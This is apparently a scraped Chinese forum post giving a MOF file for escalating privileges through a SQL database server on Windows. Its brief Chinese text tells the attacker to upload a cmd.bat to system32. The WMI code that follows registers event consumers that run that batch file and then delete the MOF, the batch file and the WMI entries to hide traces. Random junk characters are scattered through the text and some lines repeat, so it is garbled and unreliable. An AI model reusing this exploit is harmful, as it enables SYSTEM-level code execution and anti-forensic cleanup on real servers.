这个sql提权MOF需要运行 system下的文件,不能定义路径。- A6 B- Z" o# n7 N( F* Q0 p' N* f
需要将要运行的命令写入到bat上传到system32目录,然后执行。& E" p6 x# M( ~* [2 w* j' }2 x# I+ m
! g- U, T2 ^3 q8 S7 |
这个sql提权MOF需要运行 system下的文件,不能定义路径。
% e/ L: M D' y5 V& D需要将要运行的命令写入到bat上传到system32目录,然后执行。( X% S! x$ u7 Z
/ E2 v/ r7 p+ S `) R2 @
#pragma
" T5 y: |0 H3 g' k: i* ]$ | namespace("\\\\.\\root\\cimv2")- y3 j1 B: I' u0 j& j2 S) g
class9 Z% S* i% |5 A5 [
MyClass5472 E4 ` v5 \/ o6 ?
{ [key]3 Q( x+ c6 T7 z) Z
string
t* |7 s" ?9 q" M4 L" d- E) e Name;) h. T3 Y; a, R1 g- K9 @" b* Q+ g
};
' {, h2 H# c- Y* X4 y class. S8 ]- m; w: |' w/ G
ActiveScriptEventConsumer
5 f0 ?1 W7 g, @ : __EventConsumer { [key]+ X6 y/ V. ?/ @- _
string
. U/ f, G' j' o+ u6 A9 G" ~4 t Name; [not_null]9 Y9 ^& _4 v% P& v
string% I3 {4 o5 M; Z$ O1 p9 [+ Q; L
ScriptingEngine; string
( @2 w* n, X3 I& M0 I ScriptFileName; [template]
" F5 t" r% s1 l+ w string( P" `" F B# Z& B& P* X w
ScriptText; uint32 KillTimeout;+ J5 ^* V2 a5 q5 N; R3 [6 \
}; instance of __Win32Provider as $P {
. d7 \/ o2 F# E0 D! k. ? Name
" o- F( U; ~5 F( x, ~ U" k. b' L =1 z* a* S6 K& S4 S( O
"ActiveScriptEventConsumer"; CLSID =
) j- V- ?5 R% ^8 q- S: f "{266c72e7-62e8-11d1-ad89-00c04fd8fdff}";4 z2 k% U+ f* M
PerUserInitialization
- \$ @* [2 ] i0 ] = TRUE;
% j ^: P; m3 S3 O8 v; H }; instance of __EventConsumerProviderRegistration { Provider
$ _4 ]) r: Q; ~$ o* h = $P; ConsumerClassNames' R; x$ @/ f; ^' h5 C( T
=
t O# I+ d. W. `; B- E* k {"ActiveScriptEventConsumer"};
- g% j% b# g/ r/ r* t$ Q0 c };
) n: W! r3 t) e8 m Instance of ActiveScriptEventConsumer
. }: ] ]* q' X0 A' _ as $cons { Name0 I' Y3 t' {8 s! v" V% t
=
5 G1 {% M" C6 C. [' c1 n6 r1 d "ASEC"; ScriptingEngine+ u% r$ x- Y% |0 E5 c; T
=
6 e6 z( \# D3 g* J- D "JScript"; ScriptText6 m4 m' A4 H. _% R$ U' _
=5 O+ z: k: [7 D% K
"\ntry {var s = new ActiveXObject(\"Wscript.Shell\");\ns.Run(\"cmd.bat\");} catch (err) {};\nsv = GetObject(\"winmgmts:root\\\\cimv2\");try {sv.Delete(\"MyClass547\");} catch (err) {};try {sv.Delete(\"__EventFilter.Name='instfilt'\");} catch (err) {};try {sv.Delete(\"ActiveScriptEventConsumer.Name='ASEC'\");} catch(err) {};"; };& z8 J) f* w" L
Instance of ActiveScriptEventConsumer* K# _& T" V4 X5 _' k
as $cons2 { Name
6 t1 H( q% b) y# ~ =( G- S) O! ?4 b2 O' B7 P
"qndASEC"; ScriptingEngine
# ]. f& U. u& J =* J" p, w/ S" z
"JScript"; ScriptText% ]* f9 l7 T1 q% |" z
=" [- ~0 v, w4 B' W
"\nvar objfs = new ActiveXObject(\"Scripting.FileSystemObject\");\ntry {var f1 = objfs.GetFile(\"wbem\\\\mof\\\\good\\\\hBsBa.mof\");\nf1.Delete(true);} catch(err) {};\ntry {\nvar f2 = objfs.GetFile(\"cmd.bat\");\nf2.Delete(true);\nvar s = GetObject(\"winmgmts:root\\\\cimv2\");s.Delete(\"__EventFilter.Name='qndfilt'\");s.Delete(\"ActiveScriptEventConsumer.Name='qndASEC'\");\n} catch(err) {};";
: i: ^$ W8 d2 m0 C }; instance of __EventFilter as $Filt { Name
, H4 g9 a1 N/ F! I+ c5 A =$ g& t- \7 ~$ A7 c
"instfilt"; Query8 j5 v+ X/ U# D, |* K1 P
=! u. D! v0 V6 A# G/ h7 p
"SELECT * FROM __InstanceCreationEvent WHERE TargetInstance.__class = \"MyClass547\""; QueryLanguage
' {' a, @( q7 n# b6 P. T =0 R. Z7 G+ Y- y, M" e+ \7 J( z+ }" ^
"WQL"; }; instance of __EventFilter as $Filt2 { Name
d) B, l9 `9 Y* `+ |5 V. J =4 p$ i4 \) [& o r
"qndfilt"; Query$ X& L7 l$ c& v# [6 p
=
4 D5 G- C* R" x2 d0 P( @ "SELECT * FROM __InstanceDeletionEvent WITHIN 1 WHERE TargetInstance ISA \"Win32_Process\" AND TargetInstance.Name = \"cmd.bat\""; QueryLanguage/ s4 Q# g2 I9 r. \. T6 g/ U# _5 W
=
; d- G l4 P' j3 U "WQL"; }; instance of __FilterToConsumerBinding as $bind { Consumer
5 a9 |2 p' v, a = $cons; Filter
' ^4 P$ A* j8 f& O( A = $Filt;5 j8 j7 S$ d5 k z4 r
}; instance of __FilterToConsumerBinding as $bind2 { Consumer
1 m' [% q6 m* |, d- z = $cons2; Filter
; y+ M* x% j' S- W/ e& y( A = $Filt2;3 V" U* n3 t! N; _; N0 ]
}; instance of MyClass547
3 N6 @' P) ]" j* F3 z' i; \) _' f# B6 D as $MyClass { Name
5 y9 W9 r# P, q, c =: B2 ~6 h( q* ?1 s- A
"ClassConsumer";
$ f; O, }" i5 `6 Z }; |